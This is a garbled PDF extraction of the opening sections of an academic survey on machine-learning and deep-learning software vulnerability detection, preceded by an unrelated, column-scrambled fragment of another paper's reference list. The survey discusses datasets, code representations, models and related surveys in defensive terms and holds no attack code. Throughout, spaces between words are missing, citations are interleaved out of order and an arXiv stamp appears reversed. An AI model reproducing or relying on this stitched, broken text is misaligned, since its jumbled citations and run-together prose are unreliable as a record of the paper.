Infrastructure Security Agency, “Defending Against Software Supply Chain Attacks,” no. [28] Y. Kwak, W. J. Yun, S. Jung, and J. Kim, “Quantum Neural April, 2021. Networks: Concepts, Applications, and Challenges,” in International Conference on Ubiquitous and Future [16] A. L. Buczak and E. Guven, “A Survey of Data Mining and Networks, ICUFN, 2021, vol. 2021-Augus, pp. 413–416, doi: Machine Learning Methods for Cyber Security Intrusion 10.1109/ICUFN49451.2021.9528698. Detection,” IEEE Commun. Surv. Tutorials, vol. 18, no. 2, pp.
1153–1176, 2016, doi: 10.1109/COMST.2015.2494502. [29] A. Kariya and B. K. Behera, “Investigation of Quantum Support Vector Machine for Classification in NISQ era,” [17] H. F. Md Jobair, M. Tasnim, H. Shahriar, M. Valero, A. 2021, [Online]. Available: http://arxiv.org/abs/2112.06912. Rahman, and F. Wu, “Investigating Novel Approaches to Defend Software Supply Chain Attacks,” 33rd IEEE Int. [30] A. Kumar, K. S. Kuppusamy, and G. Aghila, “A learning Symp. Softw. Reliab. Eng., 2022. model to detect maliciousness of portable executable using integrated feature set,” J. King Saud Univ. - Comput. Inf. Sci., [18] L. Portnoy, E. Eskin, and S. Stolfo, “Intrusion detection with vol. 31, no. 2, pp. 252–265, 2019, doi: unlabeled data using clustering,” Proc. ACM CSS Work. Data 10.1016/j.jksuci.2017.01.003. Min. Appl. to Secur. Philadelphia PA, pp. 1–25, 2001, [Online]. Available: [31] A. Ullah, K. J. R. Espinosa, P. O. Dral, A. A. Kananenka, et http://freeworld.thc.org/root/docs/intrusion_detection/nids/I al., “A comparative study of different D-with-Unlabeled-Data-Using-Clustering.pdf. machine learning methods for dissipative quantum dynamics,” 2022 [19] V. Mkrttchian, S. Kanarev, and L. A. Gamidullaeva, [32] M. S. Akter, H. Shahriar, R. Chowdhury, and M. Mahdy, “Machine Learning and Cyber Security,” Encycl. Crim. Act. “Forecasting the risk factor of frontier markets: Deep Web, pp. 1034–1042, 2020, doi: 10.4018/978-1-5225- A novel stacking ensemble of neural network approach,” 9715-5.ch070. Future Internet, vol. 14, no. 9, p. 252, 2022. [20] K. Shaukat, S. Luo, V. Varadharajan, I. A. Hameed, and M.[33] D. S. Depto, S. Rahman, M. M. Hosen, M. S. Akter, T. R. Raian, M. S. Akter, N. Ahmed, and M. Mahdy, “Design of Reme, A. Rahman, H. Zunair, M. S. Rah- low-cost smart safety vest for the prevention of physical man, and M. Mahdy, “Automatic segmentation of blood abuse and sexual harassment,” in 2021 24th International cells from microscopic slides: a comparative Conference on Computer and Information Technology analysis,” Tissue and Cell, vol. 73, p. 101653, 2021 (ICCIT), pp. 1–6, IEEE, 2021. [34] K. R. R. Turjo, P. A. D’Costa, S. Bhowmick, A. Galib, S.
2306.11673 A Survey on Automated Software Vulnerability Detection Using Machine Learning and Deep Learning NIMASHIRIHARZEVILI,YorkUniversity,Canada ALVINEBOAYEBELLE,YorkUniversity,Canada JUNJIEWANG,InstituteofSoftware,ChineseAcademyofSciences,China SONGWANG,YorkUniversity,Canada ZHENMING(JACK)JIANG,YorkUniversity,Canada NACHIAPPANNAGAPPAN,Meta,USA Softwarevulnerabilitydetectioniscriticalinsoftwaresecuritybecauseitidentifiespotentialbugsinsoftware systems,enablingimmediateremediationandmitigationmeasurestobeimplementedbeforetheymaybe exploited.Automaticvulnerabilityidentificationisimportantbecauseitcanevaluatelargecodebasesmore efficientlythanmanualcodeauditing.ManyMachineLearning(ML)andDeepLearning(DL)basedmodels fordetectingvulnerabilitiesinsourcecodehavebeenpresentedinrecentyears.However,asurveythat summarises,classifies,andanalysestheapplicationofML/DLmodelsforvulnerabilitydetectionismissing. Itmaybedifficulttodiscovergapsinexistingresearchandpotentialforfutureimprovementwithouta comprehensivesurvey.Thiscouldresultinessentialareasofresearchbeingoverlookedorunder-represented, leadingtoaskewedunderstandingofthestateoftheartinvulnerabilitydetection.Thisworkaddressthatgap bypresentingasystematicsurveytocharacterizevariousfeaturesofML/DL-basedsourcecodelevelsoftware vulnerabilitydetectionapproachesviafiveprimaryresearchquestions(RQs).Specifically,ourRQ1examines thetrendofpublicationsthatleverageML/DLforvulnerabilitydetection,includingtheevolutionofresearch andthedistributionofpublicationvenues.RQ2describesvulnerabilitydatasetsusedbyexistingML/DL-based models,includingtheirsources,types,andrepresentations,aswellasanalysesoftheembeddingtechniques usedbytheseapproaches.RQ3exploresthemodelarchitecturesanddesignassumptionsofML/DL-based vulnerabilitydetectionapproaches.RQ4summarisesthetypeandfrequencyofvulnerabilitiesthatarecovered byexistingstudies.Lastly,RQ5presentsalistofcurrentchallengestoberesearchedandanoutlineofa potentialresearchroadmapthathighlightscrucialopportunitiesforfuturework. CCSConcepts:•Securityandprivacy→Softwaresecurityengineering. AdditionalKeyWordsandPhrases:sourcecode,softwaresecurity,softwarevulnerabilitydetection,software bugdetection,machinelearning,deeplearning ACMReferenceFormat: NimaShiriharzevili,AlvineBoayeBelle,JunjieWang,SongWang,ZhenMing(Jack)Jiang,andNachiappan Nagappan.2018.ASurveyonAutomatedSoftwareVulnerabilityDetectionUsingMachineLearningandDeep Learning.J.ACM37,4,Article111(August2018),37pages.https://doi.org/XXXXXXX.XXXXXXX Authors’addresses:NimaShiriharzevili,nshiri@yorku.ca,YorkUniversity,4700KeeleSt.,NorthYork,Ontario,Canada, M3J1P3;AlvineBoayeBelle,YorkUniversity,4700KeeleSt.,NorthYork,Canada,alvine.belle@lassonde.yorku.ca;Junjie Wang,InstituteofSoftware,ChineseAcademyofSciences,Beijing,China,junjie@iscas.ac.cn;SongWang,YorkUniversity, 4700KeeleSt.,NorthYork,Canada,wangsong@yorku.ca;ZhenMing(Jack)Jiang,YorkUniversity,4700KeeleSt.,North York,Canada,zmjiang@eecs.yorku.ca;NachiappanNagappan,Meta,Seattle,USA,nachiappan.nagappan@gmail.com. Permissiontomakedigitalorhardcopiesofallorpartofthisworkforpersonalorclassroomuseisgrantedwithoutfee 111 providedthatcopiesarenotmadeordistributedforprofitorcommercialadvantageandthatcopiesbearthisnoticeand thefullcitationonthefirstpage.CopyrightsforcomponentsofthisworkownedbyothersthanACMmustbehonored. Abstractingwithcreditispermitted.Tocopyotherwise,orrepublish,topostonserversortoredistributetolists,requires priorspecificpermissionand/orafee.Requestpermissionsfrompermissions@acm.org. ©2018AssociationforComputingMachinery. 0004-5411/2018/8-ART111$15.00 https://doi.org/XXXXXXX.XXXXXXX J.ACM,Vol.37,No.4,Article111.Publicationdate:August2018. 3202 nuJ 02 ]ES.sc[ 1v37611.6032:viXra11N1:i2maShiriharzevili,AlvineBoayeBelle,JunjieWang,SongWang,ZhenMing(Jack)Jiang,andNachiappanNagappan 1 INTRODUCTION Automaticdetectionofsoftwaresecurityvulnerabilitiesisacriticalcomponentofassuringsoftware security.MachineLearning(ML)andDeepLearning(DL)breakthroughshavesparkedgreatinterest inemployingthesemodelstodiscoversoftwarevulnerabilitiesingeneralsoftwaresystems..[28, 79,84,137,145].ML/DLmodelsexcelatdiscoveringsubtlepatternsandcorrelationsfromlarge datasets.Theycanautomaticallyextractmeaningfulfeaturesfromrawdata,suchassourcecode, andidentifyhiddenpatternsthatmayindicatesoftwarevulnerabilities.Thiscapabilityiscrucialin vulnerabilitydetection,asvulnerabilitiesofteninvolvesubtlecodecharacteristicsanddependencies. Also,ML/DLmodelscanhandleawiderangeofdatatypesandformats,includingsourcecode[32, 33, 64, 95, 128, 134, 138, 144], textual information [60], and numerical features such as commit characteristics [113, 147]. They can process and analyze these data representations to detect vulnerabilitieseffectively.Thisflexibilityallowsresearcherstoleveragevarioussourcesofdataand incorporatedifferentfeaturesforcomprehensivevulnerabilitydetection.Theoverallprocessto leverageML/DLmodelsforsoftwarevulnerabilitydetectionisasfollows:Datacollection:The firststeptowardbuildingavulnerabilitydetectionmodelistocollectrelevantvulnerabledatafor
trainingthemodels.Therearemultiplesourcesforvulnerabilitydetectiondatasets(weelaborateon thisinRQ2),theresearcherseitherusebenchmarkdata[17,42,49,76,87,88,140,147,157,158,160] or collect from the open source [25, 45, 110, 114, 120] based on the requirements and the type ofvulnerabilities.Datarepresentation:Oncethedataiscollected,itneedstobepreprocessed toprepareitfortraining.Thepreprocessincludesusingappropriaterepresentationtechniques, i.e., graph/tree representation [17, 30, 38, 49, 82, 87, 90, 91, 97, 140, 153, 156, 157, 160], token representation[25,42,55,58,62,76,124,158,161],orusingcommitcharacteristics.Embedding: Thisstepinvolvesconvertingthesourcecoderepresentationintonumericalformat[17,45,49,55, 58,62,76,91,114,124,161](vectorsorembeddings)thatcanbeutilizedbymachinelearningor deeplearningmodelsforvulnerabilitydetection.Modelselectionandarchitecturedesign:An suitableML/DLmodelmustbechosenbasedonthesoftwarevulnerabilitydetectiontask.This canincludeeverythingfromsimpleMLalgorithmslikeSVMorRandomForests[24,123,155]to moreadvancedDLarchitectureslikeCNNs[60,62,145]orRNNs.Thearchitectureofthemodelis intendedtoextractsignificantcharacteristicsandpatternsfromtheinputdata.Training:Inthe trainingphase,thevulnerabilitydetectiondatasetisseparatedintotrainingandvalidationsets, andthemodellearnsfromlabeleddata.Themodel’sparametersareupdatediterativelydepending onthepredictionerrors,usingoptimizationtechniquessuchasgradientdescent.Evaluationand validation:Oncethetrainingisfinished,themodel’sperformanceisevaluatedusingaseparate testdataset.Variousmetricssuchasaccuracy,precision,recall,andF1scorearecalculatedtoassess themodel’seffectivenessindetectingvulnerabilities.Themodelmayalsobevalidatedagainst real-worldvulnerabilitiestomeasureitspracticalutility. AlthoughmanystudieshaveutilizedML/DLtodetectsoftwarevulnerabilities,therehasnot beenacomprehensivereviewtoconsolidatethevariousapproachesandcharacteristicsofthese techniques. Conducting such a systematic survey would be beneficial for practitioners and re- searchers to gain a better understanding of the current state-of-the-art tools for vulnerability detection,andcouldserveasinspirationforfuturestudies.Thisstudyconductsadetailedand comprehensivesurveytoreview,analyze,describe,andclassifyvulnerabilitydetectionpapersfrom differentperspectives.Weanalyzed67articlespublishedin37flagshipSEjournalsandconferences from2011to2022.Weinvestigatedthefollowingresearchquestions(RQs)inthisstudy: • RQ1:WhatisthetrendofstudiesusingML/DLmodelsforvulnerabilitydetection? – RQ1.1.Whatarethetrendsofstudiesinsoftwarevulnerabilitydetectionstudiesovertime? – RQ1.2.Whatisthedistributionofthepublicationvenues? J.ACM,Vol.37,No.4,Article111.Publicationdate:August2018.ASurveyonAutomatedSoftwareVulnerabilityDetectionUsingMachineLearningandDeepLearning 111:3 • RQ2:Whatarethecharacteristicsofexperimentdatasetsusedinsoftwarevulnera- bilitydetection? – RQ2.1.Whatisthesourceofdata? – RQ2.2.Whatarethetypesofdatausedinprimarystudies? – RQ2.3.Howinputdataarerepresented? – RQ2.4.Howinputdataareembeddedforfeaturespace? • RQ3.WhatarethedifferentML/DLmodelsusedforvulnerabilitydetection? • RQ4.Whatarethemostfrequenttypeofvulnerabilitiescoveredinthesestudies? • RQ5.Whatarepossiblechallengesandopendirectionsinsoftwarevulnerability detection? Thispapermakesthefollowingcontributions: • Wethoroughlyanalyzed67relevantstudiesthatusedML/DLtechniquestodetectsecurity vulnerabilitiesregardingpublicationtrends,distributionofpublicationvenues,andtypesof contributions. • Weconductedacomprehensiveanalysistounderstandthedataset,theprocessingofdata, datarepresentation,modelarchitecture,modelinterpretability,andthetypesofinvolved vulnerabilitiesoftheseML/DL-basedvulnerabilitydetectiontechniques. • WeprovidedaclassificationofML/DLmodelsusedinvulnerabilitydetectionbasedontheir architecturesandanalysisoftechniqueselectionstrategyonthesemodels. • WediscussdistincttechnicalchallengesofusingML/DLtechniquesinvulnerabilitydetection andoutlinekeyfuturedirections. • Wehavesharedourresultsandanalysisdataasareplicationpackage1 toallowotherre- searcherseasilyfollowthispaperandextendit. We believe that this work is useful for researchers and practitioners in the field of software engineeringandcybersecurity,particularlythosewithaninterestinsoftwarevulnerabilitydetection andmitigation.Inaddition,thefindingsofoursystematicsurveymayalsobeusefultopolicymakers, softwarevendors,andotherstakeholderswhoareconcernedwithimprovingsoftwaresecurityand reducingtheriskofcyberattacks.Theseindividualsmayusetheinsightsprovidedbythereviewto informtheirdecisionsaboutsoftwaredevelopment,procurement,andriskmanagement. Theremainingpartofthispaperisorganizedasfollows:Section2summarizesexistingstudies focusingonproposingasystematicsurveyforsoftwarevulnerabilitydetection.Section2presents relatedworkonsystematicsurveysforsoftwarevulnerabilitydetectionusingML/DLtechniques. Section3presentstheresearchmethodologyproposedinthispaperforpapercollectionandcriteria
forincludingandexcludingstudies.Section4addressesresearchquestionsandcorresponding results.Section5discussesthepossiblelimitationsofthissystematicsurvey.Finally,section6 discussestheconclusionandfuturedirections. 2 BACKGROUNDANDRELATEDWORK Inthissectionofthepaper,wefirstprovideabackgroundonthedefinitionofvulnerabilityand thedifferentstepsinsoftwarevulnerabilitydetection.Thenwediscusstherelatedsurveysand highlighttheirdifferencescomparedtooursurvey. 2.1 Background Softwarevulnerabilitymanagementisnowessentialforguaranteeingthesecurityandintegrity ofsoftwaresystems[20,43,119,135].Giventheincreasingrelianceonsoftwareformanycritical processessuchasfinancialtransactions,thefrequencyofvulnerabilitiesposesseriousrisks..[57,99], 1https://colab.research.google.com/drive/1O42duwz34H3fRoyfA37EU6Ig2u16R1Lb?usp=sharing J.ACM,Vol.37,No.4,Article111.Publicationdate:August2018.11N1:i4maShiriharzevili,AlvineBoayeBelle,JunjieWang,SongWang,ZhenMing(Jack)Jiang,andNachiappanNagappan autonomousdriving[46,100],andmission-criticalsystems[53,56].Softwarevulnerabilitiescanbe exploitedbymaliciousentitiestogainunauthorizedaccess,compromisesensitiveinformation,or disruptservicesiftheygoundetectedorignored.[56].Asaresult,excellentsoftwarevulnerability managementiscrucialtohandlingtheserisks,preservinguserprivacy[5],maintainingsystem availability, and assuring software application trustworthiness [104]. By proactively detecting, analyzing,andremediatingvulnerabilities,organizationsmaystrengthentheirsoftwaresystems againstchangingcybersecuritythreats[6]andadheretoindustrybestpracticesforsafesoftware developmentanddeployment. Therearemultiplestepsinsoftwarevulnerabilitymanagementincludingvulnerabilitydetec- tion[17],vulnerabilityanalysis[73],andvulnerabilityremediation[77].Inthefollowingsubsections, weelaborateoneachstepindetail. 2.1.1 Vulnerabilitydetection. Vulnerabilitydetectioniscriticalintheoverallprocessofmanaging softwarevulnerabilities[17,17,28,64,87,90,95,134,136,158,160].Itcomprisesdetectingand investigatingpossiblesecurityweaknessesinsoftwaresystemsthatattackersmayexploit.There areseveraltraditionaltechniquescommonlyusedforvulnerabilitydetection: ManualCodeAuditing[7,18,126,127,130]:Inthismethod,humanexpertsexaminethesource thoroughly with the goal of manually detecting coding flaws, unsafe procedures, and possible vulnerabilities.Manualcodereviewistime-consumingandrequirestheknowledgeofqualified developersorsecurityanalysts.However,itprovidesforathoroughgraspofthecodeandcan revealsubtlebugsthatautomatedtoolsmayoverlook. StaticAnalysis[39,41,75,103,129,139]:Staticanalysisinvolvesusingautomatedtoolstoanalyze thesourcecodeorcompiledbinarieswithoutexecutingthesoftware.Itexaminesthecodestructure, identifiespotentialcodingissues,anddetectscommonvulnerabilitiessuchasbufferoverflows[56], injectionattacks,andinsecuredatahandling.Staticanalysistoolsemployvarioustechniqueslike dataflowanalysis,controlflowanalysis,andpatternmatchingtoidentifypotentialvulnerabilities. Theycanhelpscalevulnerabilitydetectioneffortsbyanalyzinglargecodebasesefficiently. Dynamic Analysis [15, 81, 106]: The goal of dynamic analysis is to evaluate the behavior of softwarewhileitisrunning.Runningthesoftwareinacontrolledenvironmentorthroughauto- matedtestswhilemonitoringitsexecutionandinteractionswithsystemresourcesiswhatitentails. Dynamicanalysiscandetectbugsininputvalidation[70],accesscontrol,anderrorhandling.This approach can identify vulnerabilities that static analysis alone cannot detect by analyzing the real-timebehaviorofthesoftware.However,thedynamicanalysismayhaveconstraintsinterms ofsignificantsystemoverhead[149]. 2.1.2 Vulnerabilityanalysis. Afterthedetectionofvulnerabilities,thesubsequentstepinsoftware vulnerabilitymanagementisvulnerabilityanalysisandassessment[44,63,78,80,101,131,148]. Thisstepinvolvesfurtherexaminingtheidentifiedvulnerabilitiestoassesstheirseverity,impact, andpotentialexploitability. Severity:Accuratelyassessingsoftwarevulnerabilitiesisvitalforseveralreasons.Firstly,itallows organizations to prioritize their response based on the severity of the vulnerabilities. Severity referstothepotentialimpactavulnerabilitycouldhaveifexploited[23,73,74,133].Byaccurately assessingtheseverity,organizationscanfocustheirattentiononhigh-severityvulnerabilitiesthat posesignificantriskstothesecurityandfunctionalityofthesoftwaresystem. Impact:Secondly,accuratelyassessingvulnerabilitieshelpsdeterminethepotentialimpactthey may have on the organization [27, 47, 51, 65]. The term impact refers to the repercussions of exploitingavulnerability,suchasdenialofservice[56]ordatabreaches[1].Byunderstandingthe potentialimpact,organizationscanmakeinformeddecisionsregardingtheurgencyandpriorityof remediationefforts. J.ACM,Vol.37,No.4,Article111.Publicationdate:August2018.ASurveyonAutomatedSoftwareVulnerabilityDetectionUsingMachineLearningandDeepLearning 111:5
exploitability:Furthermore,accuratelyassessingvulnerabilitiesaidsinunderstandingtheirpo- tential exploitability [13, 21, 22]. This entails determining the possibility that an attacker will besuccessfulinexploitingthevulnerabilitytoinfiltratethesoftwaresystem.Organizationscan estimatetheamountofriskassociatedwitheachvulnerabilityandinvestresourcesaccordinglyby evaluatingcriteriasuchastheeaseofexploitationandtheavailabilityofexploittechniques. 2.1.3 Vulnerabilityremediation. Theprocessofaddressingdetectedsoftwarevulnerabilitiesby differenttechniquessuchaspatching,codemodification,andrepairingisreferredtoassoftware vulnerability remediation [8, 16, 26, 117]. The fundamental goal of remediation is to eliminate ormitigatevulnerabilitiesinordertoimprovethesoftwaresystem’ssecurityanddependability. One common approach to vulnerability remediation is applying patches provided by software vendorsoropen-sourcecommunities[50,83,141].Patchesareupdatesorfixesthataddressspecific vulnerabilitiesorweaknessesidentifiedinasoftwaresystem. 2.1.4 ML/DLforsoftwarevulnerabilitydetection. Byutilizingdataanalysis,patternrecognition, andmachine-drivenlearningforfindingsoftwaresecurityvulnerabilities,ML/DLapproacheshave revolutionizedsoftwarevulnerabilitydetection.[28,79,84,137,145].Thesetechniquesimprove theaccuracyandefficiencyofvulnerabilitydetection,potentiallyallowingforautomateddetection, fasteranalysis,andtheidentificationofpreviouslyundisclosedvulnerabilities. OnecommonapplicationofML/DLinvulnerabilitydetectionistheclassificationofcodesnip- pets[32,64,128,138],softwarebinaries[61,109,116,145],orcodechangesminedfromopen-source repositoriessuchasGitHuborCVE[35,60,85,94,118,123,136,154].MLmodelscanbetrainedon labeleddatasets,whereeachsamplerepresentsaknownvulnerabilityornon-vulnerability.These modelsthenlearntogeneralizefromtheprovidedexamplesandclassifynewinstancesbasedon thepatternstheyhavelearned.Thismethodallowsforautomaticvulnerabilitydiscoverywithout theneedformanualexamination,considerablyloweringthetimeandeffortnecessaryforanalysis. ML/DLmodelsfordetectingsoftwarevulnerabilitieshavepromisingadvantagesovertraditional methodologies.Eachbenefitisdiscussedindepthinthenextparagraph. Automation:Automationisasignificantadvantage.MLmodelscanautomaticallyscanandanalyze largecodebases,networktrafficlogs,orsystemconfigurations,flaggingpotentialvulnerabilities withoutrequiringhumaninterventionforeachindividualcase[19].Thisautomationspeedsup thedetectionprocess,allowingsecurityteamstofocusonverifyingandmitigatingvulnerabilities ratherthanmanualanalysis. Performance:ML/DLapproachesofferfasteranalysis.Traditionalvulnerabilitydetectionmethods relyonmanualinspectionortheapplicationofpredefinedrules[7,18,126,127,130].Incontrast, ML/DLapproachescanevaluateenormousvolumesofdatainparallelandgeneratepredictions fast,dramaticallyshorteningthetimenecessarytofindvulnerabilities. Detectioneffectiveness:ML/DLmodelscanuncoverpreviouslyunknownvulnerabilities,com- monlyknownaszero-dayvulnerabilities[10].Thesemodelsmayuncoversignsofvulnerabilities evenwhentheyhavenotbeenspecificallytrainedonthembylearningpatternsandgeneralizing fromlabeleddata.Thiscapabilityimprovestheoverallsecurityposturebyhelpingtoidentifyand addressunknownweaknessesinsoftwarebeforetheyareexploitedbyattackers[2]. 2.2 Relatedwork Therehavebeenseveralexistingsurveypapersonsoftwarevulnerabilitiesintheliterature.Inthis section,weanalyzetheexistingpapersbasedondifferentaspectsasshowninTable1. The columns in the table represent different aspects of the surveys, such as the data source used,representation,featureembedding,ML/DLmodels,vulnerabilitytypes,andinterpretability ofML/DLmodels.DataSourceindicateswhetherthesurveyreviewedvulnerabilitydetectiondata J.ACM,Vol.37,No.4,Article111.Publicationdate:August2018.11N1:i6maShiriharzevili,AlvineBoayeBelle,JunjieWang,SongWang,ZhenMing(Jack)Jiang,andNachiappanNagappan Table1. Comparisonofcontributionsbetweenoursurveyandtheexistingrelatedsurveys/reviews. No Studies DataSource Representation Embedding Models VulnerabilityTypes Interpretability 1 Trietetal.[77] ✓ × ✓ ✓ × × 2 Ghaffarianetal.[48] ✓ ✓ ✓ ✓ × × 3 Linetal.[89] ✓ ✓ ✓ ✓ × × 4 Zengetal.[151] ✓ ✓ ✓ ✓ × × 5 Semasabaetal.[125] ✓ ✓ × ✓ ✓ × 6 Sunetal.[132] ✓ × × × ✓ × 7 Kritikosetal.[71] ✓ × × × ✓ × 8 Khanetal.[69] × × × × × × 9 Nongetal.[111] × × × × × × 10 Chakrabortyetal.[19] × × × × × × 11 Liuetal.[93] × × × × × × 12 Bietal.[9] × × × × × × 12 Oursurvey ✓ ✓ ✓ ✓ ✓ ✓ sources.Representationdiscusseswhetherthesurveyconsideredsourcecoderepresentationinits analysis.Embeddingdealswithwhetherthesurveyisanalyzedfeatureembeddinginitsanalysis. ThetablealsoconsidersML/DLmodelsinthesixthcolumnasMLModels.Thetablealsochecks whetherthesurveyconsidersvulnerabilitytypesbasedonCommonWeaknessEnumeration(CWE)
number.Thelastcolumnindicateswhetherthesurveytakesintoaccounttheinterpretabilityof ML/DLmodels. Ghaffarianetal.[48]istheclosestsurveytoourswhenitcomestodata-drivensecurityvul- nerabilitydetection.Intheirsurvey,theyanalyzeddata-drivensoftwarevulnerabilitydetection fromvariousaspectsincludingDataSources,Representation,Embeddingtypes,anddifferentML/DL modelsasshowninTable1.However,thereareacoupleofdifferencescomparedtoourwork. Specifically,thisworkalsosurveysvulnerabilitydetectionfromthefollowingaspects:Compre- hensiveCoverage:Understandingthemanysortsofvulnerabilitiesallowsresearcherstocreate anddevelopeffectivevulnerabilitydetectionmodelsthatcanthoroughlydiscoversecurityvulnera- bilities.Toguaranteethattheirdetectionsystemscoverasmanyvulnerabilitytypesaspossible, researchers must be familiar with the various methods of attack and potential weaknesses in softwaresystems.CustomizationofDetectionTechniques:Differentsortsofvulnerabilities necessitatedistinctdetectionmethods.Tobuildspecializeddetectionsystemsthatcandiscover certaintypesofvulnerabilities,researchersmustfirstunderstandthesubtletiesofeachvulnera- bilitytype.PrioritizationofMitigationEfforts:Researcherscanprioritizemitigationefforts dependingontheseverityandeffectofeachvulnerabilitybyunderstandingthemanytypesof vulnerabilities.Criticalvulnerabilitiesthatposethegreatestdangertothesystemororganization canbeprioritizedbyresearchers.BetterUnderstandingofAttackPatterns:Understanding thedifferenttypesofvulnerabilitiesprovidesresearcherswithinsightsintothedifferentattack patternsusedbyattackers.Thisknowledgehelpsresearchersdesigndetectiontechniquesthatcan detectnotonlyknownattackpatternsbutalsonew,unknownpatterns.Interpretabilityrefersto theabilitytoexplainhowamodelmakesaparticulardecisionorprediction.Thisisparticularly importantinthecontextofsoftwarevulnerabilitydetectionbecausesecurityresearchersneedto beabletounderstandwhyamodelisflaggingaparticularpieceofcodeaspotentiallyvulnerable. Additionally,interpretabilitycanhelpimprovetrustinthemodel’spredictions.Ifdevelopersand securityresearcherscanunderstandhowamodelismakingitsdecisions,theyaremorelikelyto trustitsoutputandtakeappropriateactionsbasedonitsrecommendations. Trietetal.[77]revieweddata-drivenvulnerabilityassessmentandprioritizationstudies.They conductareviewofpriorresearchonsoftwareassessmentandprioritizationthatleveragesmachine learninganddataminingmethods.Theyexaminevarioustypesofresearchinthisarea,discussthe strengthsandweaknessesofeachapproach,andhighlightsomeunresolvedissuesandpotential J.ACM,Vol.37,No.4,Article111.Publicationdate:August2018.ASurveyonAutomatedSoftwareVulnerabilityDetectionUsingMachineLearningandDeepLearning 111:7 areasforfutureresearch.Themajordifferencetooursisthatwereviewvulnerabilitydetection approacheswhiletheysurveyassessmentandprioritizationtechniques.Vulnerabilitydetection, vulnerabilityassessment,andvulnerabilityprioritizationareallimportantcomponentsofthevul- nerabilitymanagementlife-cycle,buttheyinvolvedifferentstagesofthevulnerabilitymanagement process.OurworkfocusesonVulnerabilitydetectionwhichreferstotheprocessofidentifying potentialvulnerabilitiesinsoftwaresystems.Thegoalofvulnerabilitydetectionistoidentifyall vulnerabilitiesthatexistwithinthesystem,regardlessoftheirseverity.Vulnerabilityassessment,on theotherhand,involvesevaluatingtheseverityandpotentialimpactofeachidentifiedvulnerability. Thisassessmentcaninvolveanalyzingfactorssuchasthelikelihoodofthevulnerabilitybeing exploitedandthepotentialharmthatcouldresult.Vulnerabilityprioritizationinvolvesrankingthe identifiedvulnerabilitiesbasedontheirlevelofriskorcriticality.Thisrankingistypicallybased ontheresultsofthevulnerabilityassessment,aswellasotherfactorssuchastheavailabilityof resourcestoaddressthevulnerabilities. Lin et al. [89] examined the literature on using deep learning and neural network-based ap- proaches for detecting software vulnerabilities. There are a couple of differences compared to oursurvey.First,thestudyofconventionalsourcecoderepresentationtechniques(Staticcode attributes)forsoftwarevulnerabilitydetection.Inoursurvey,weneglecttoreviewsuchrepresen- tationtechniquesforacoupleofreasons.Staticcodeattributes,suchascodelengthorcomplexity, maynotbeeffectiveforvulnerabilitydetectionbecausetheydonotcapturethedynamicbehavior ofthecodeatruntime.Vulnerabilitiescanmanifestthemselvesinunexpectedwaysthatarenot apparentinthestaticcode,makingitdifficulttodetectthemthroughstaticanalysisalone.Addition- ally,staticcodeattributesmaynotbeabletocapturethecontextofthecode,whichisimportantfor understandinghowthecodeinteractswithothercomponentsinasystem.Finally,staticanalysis toolsmayproduceahighrateoffalsepositives,whichcanbetime-consumingtoverifyandmay causedeveloperstoignoreimportantvulnerabilities.Second,weexaminethetrendanalysisof paperspublishedinsoftwarevulnerabilitydetectioninajournalandconferencepapersbecauseit providesacomprehensiveunderstandingofthepublishingpatternsinaparticularfieldorareaof
research.Thetrendanalysiscanshedlightonthedistributionofresearchoutputacrossvarious publicationvenuesandtheshiftingpreferencesofresearchersandauthors.Thisinformationcan beusefulforstakeholderssuchaspublishers,academicinstitutions,andresearchersinmaking strategicdecisionsrelatedtopublishing,funding,andresearchcollaborations. Zengetal.[151]discussedtheincreasingattentiontowardsexploitablevulnerabilitiesinsoft- wareandthedevelopmentofvulnerabilitydetectionmethods,specificallytheapplicationofML techniques.Thepaperreviews22recentstudiesthatusedeeplearningtodetectvulnerabilities andidentifiesfourgamechangersthathavesignificantlyimpactedthisfield.Thesurveyfurther compares the game changers based on different aspects in software vulnerability detection in- cluding data source, feature representation, DL models, and detection granularity. There are a coupleofdifferencescomparedtooursurvey.First,weanalyzethetrendpatternsofpaperson softwarevulnerabilitydetectionthathavebeenpublishedinjournalsandconferences.Thisanalysis helpsusgainathoroughcomprehensionofthepublicationtrendsinaspecificareaofresearchor field.Second,wecovermoreaspectsofsoftwarevulnerabilitydetection.Whiletheyonlycover datasource,featurerepresentation,DLmodels,anddetectiongranularity,wecovermoreaspects includingvulnerabilitytypesandinterpretabilityofML/DLmodels.Additionally,weprovidea moregranularanalysisofdifferentaspects. Kritikos et al. [71] and Sun et al. [132] focused on cybersecurity and aim to improve cyber resilience.Sunetal.[132]discussedtheparadigmchangeinunderstandingandprotectingagainst cyberthreatsfromreactivedetectiontoproactiveprediction,withanemphasisonnewresearchon cybersecurityincidentpredictionsystemsthatusemanytypesofdatasources.Kritikosetal.[71] J.ACM,Vol.37,No.4,Article111.Publicationdate:August2018.11N1:i8maShiriharzevili,AlvineBoayeBelle,JunjieWang,SongWang,ZhenMing(Jack)Jiang,andNachiappanNagappan discussesthechallengesofmigratingapplicationstothecloudandensuringtheirsecurity,witha focusonvulnerabilitymanagementduringtheapplicationlifecycleandtheuseofopen-source toolsanddatabasestobettersecureapplications.Whilethetopicsofthetwoabstractsaredifferent, theyshareacommongoalofimprovingcybersecurityandresilience.Bothhighlighttheimportance ofproactivemeasurestopreventormitigatecyberthreats,ratherthanrelyingsolelyonreactive detectionandresponse.Additionally,bothhighlighttheimportanceofutilizingvariousdatasources andtoolstoimprovecybersecuritymeasures.Whilebothapproachesaimtoimprovethesecurity ofapplications,theydifferintheirfocusandtechniquesused.Theymainlyfocusonproviding guidanceandtoolstosupportvulnerabilitymanagementduringtheapplicationlifecycle,whilein oursurvey,wefocusonsoftwarevulnerabilitydetectionusingML/DLtechniquesonsourcecode whichaimatautomatingtheidentificationofvulnerabilitiesinthesourcecode. Khanetal.[69]focusedonVulnerabilityAssessment,whichistheprocessoffindingandfixing vulnerabilitiesinacomputersystembeforetheycanbeexploitedbyhackers.Thishighlightsthe necessityformorestudiesintoautomatedvulnerabilitymitigationstrategiesthatcaneffectively securesoftwaresystems.Ontheotherhand,vulnerabilityidentificationwithML/DLapproacheson sourcecodeentailsanalyzinganapplication’ssourcecodeinordertospotsecurityflaws.Instead ofevaluatingthesafetyoftheentiresystem,thismethodconcentratesonfindingvulnerabilitiesin thecodeitself. Nongetal.[111]exploredtheopen-scienceaspectsofstudiesonsoftwarevulnerabilitydetection andarguedthereisadearthofresearchonproblemsofopenscienceinsoftwareengineering, particularlywithregardtosoftwarevulnerabilitydetection.Theauthorsconductedanexhaustive literature studyand identify55 relevant works thatpropose deeplearning-based vulnerability detectionapproaches.Theyinvestigatedopenscienceaspectsincludingavailability,executability, 